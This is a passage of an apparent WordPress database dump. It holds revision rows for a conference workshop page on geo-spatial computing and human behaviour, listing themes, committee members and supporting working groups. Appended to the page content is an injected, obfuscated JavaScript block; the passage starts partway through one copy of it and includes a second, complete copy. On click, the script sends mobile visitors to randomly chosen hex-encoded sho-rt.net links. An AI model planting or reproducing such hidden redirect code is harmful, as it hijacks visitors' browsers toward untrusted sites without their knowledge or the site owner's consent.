_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2023-01-07 14:09:42','2023-01-07 14:09:42','',2791,'https://gsw2023.com/?p=3534',0,'revision','',0),
(3535,1,'2023-01-07 14:09:59','2023-01-07 14:09:59','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5></h5>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n<li>Marco Minghini, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>ICWG IV/III/II: Openness in Geospatial Science and Remote Sensing</li>\n<li>WG IV/6: Human Behaviour and Spatial Interactions</li>\n</ul>\n<p>&nbsp;</p>\n<h5></h5>\n<h5></h5>\n<h5><strong>Special Issue for the workshop:</strong></h5>\n<p>The authors of selected papers in the workshop will be invited to submit an extended full paper to the Transactions in GIS (<a href=\"https://onlinelibrary.wiley.com/journal/14679671\">https://onlinelibrary.wiley.com/journal/14679671</a>; current impact factor: 2.568). The selected papers will go through the peer-review process of the journal.[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GeoHB 2023: Geo-Spatial Computing for Understanding Human Behaviours','','inherit','closed','closed','','2791-revision-v1','','','2023-01-07 14:09:59','2023-01-07 14:09:59','',2791,'https://gsw2023.com/?p=3535',0,'revision','',0),
(3536,1,'2023-01-07 14:10:57','2023-01-07 14:10:57','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2816\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Urban spaces have become complex, being shaped by diverse human behaviours. Therefore, the sustainability of development has faced various challenges ranging from pollution to equity in accessibility to activity spaces and opportunities. Using spatial big data and new computing technologies is an effective way to a better understanding of the interaction between individuals and urban environments, which would be beneficial to tackle urban challenges. This workshop focuses on new advanced technologies on spatial data representation and interoperability, geo-computation and -simulation, and GeoAI, which can harness human behaviour related spatial big data, discovering the mechanisms of the interaction between human behaviours and urban environments.</strong></h5>\n<p>[/vc_column_text][vc_separator color=\"pink\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"49\"][vc_row_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5></h5>\n<h5><strong>Themes of event:</strong></h5>\n<ul>\n<li>Geo-computation and geo-simulation models for understanding human mobility patterns and underlying mechanisms of the interactions between human behaviours and urban environments</li>\n<li>Computational time geographical methods for modelling and representing human activity-travel behaviour</li>\n<li>Spatio-temporal data mining methods for uncovering human behaviour and its interactions with urban environments</li>\n<li>Knowledge-based geo-computation for reasoning human behaviour contexts</li>\n<li>GeoAI-based technique for sensing urban environments using spatio-temporal big data</li>\n<li>Computational methods for analysing individual and collective behaviour uncertainties within complex systems</li>\n<li>Reliability-based measures for quantifying accessibility under behavioural and environmental uncertainties</li>\n<li>Reliable geo-computation methods for optimizing activity-travel scheduling under uncertainties</li>\n<li>Conceptual models for human behaviour related spatial data representation and associated data such as time series.</li>\n<li>Use case of international standards to foster scalability and reusability of solutions for human mobility big data.</li>\n<li>New solutions for effective and meaningful spatial data integration for human activity pattern study</li>\n<li>Geo-visualization and spatial representation methods of spatio-temporal big data on human mobility</li>\n<li>New developments of strategies and automated computational approaches for handling geo-privacy and ethical issues involved in the analysis of and use of individuals’ spatial data</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Scientific Committee:</strong></h5>\n<ul>\n<li>Pawel Boguslawski, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Elisabetta Colucci, Politecnico di Torino, Italy</li>\n<li>Chen-Chieh Feng, National University of Singapore, Singapore</li>\n<li>Rui Zhu, Agency for Science, Technology and Research, Singapore</li>\n<li>James Haworth, University College London, UK</li>\n<li>Tao Jia, Wuhan University, China</li>\n<li>Xiao Li, University of Oxford, UK</li>\n<li>Chun Liu, Tongji University, China</li>\n<li>Xintao Liu, The Hong Kong Polytechnic University, China</li>\n<li>Francesca Noardo, Open Geospatial Consortium</li>\n<li>Azarakhsh Rafiee-Voermans, Delft University of Technology, Netherlands</li>\n<li>PWitold Rohm, Wroclaw University of Environmental and Life Sciences, Poland</li>\n<li>Shih-Lung Shaw, University of Tennessee, Knoxville, USA</li>\n<li>Katarzyna Sila-Nowicka, University of Auckland, New Zealand</li>\n<li>Noam Shoval, Hebrew University of Jerusalem, Israel</li>\n<li>Donggen Wang, The Hong Kong Baptist University, China</li>\n<li>Martin Werner, Technical University of Munich, Germany</li>\n<li>René Westerholt, Technical University of Dortmund, Germany</li>\n<li>Hangbin Wu, Tongji University, China</li>\n<li>Marco Minghini, European Commission - Joint Research Centre (JRC), Italy</li>\n</ul>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<h5><strong>Supporting ISPRS Working Groups:</strong></h5>\n<ul>\n<li>WG IV/1: Spatial data representation and interoperability</li>\n<li>WG IV/3: Geo-computation and geo-simulation</li>\n<li>ICWG IV/III/II: Openness in Geospatial Science and 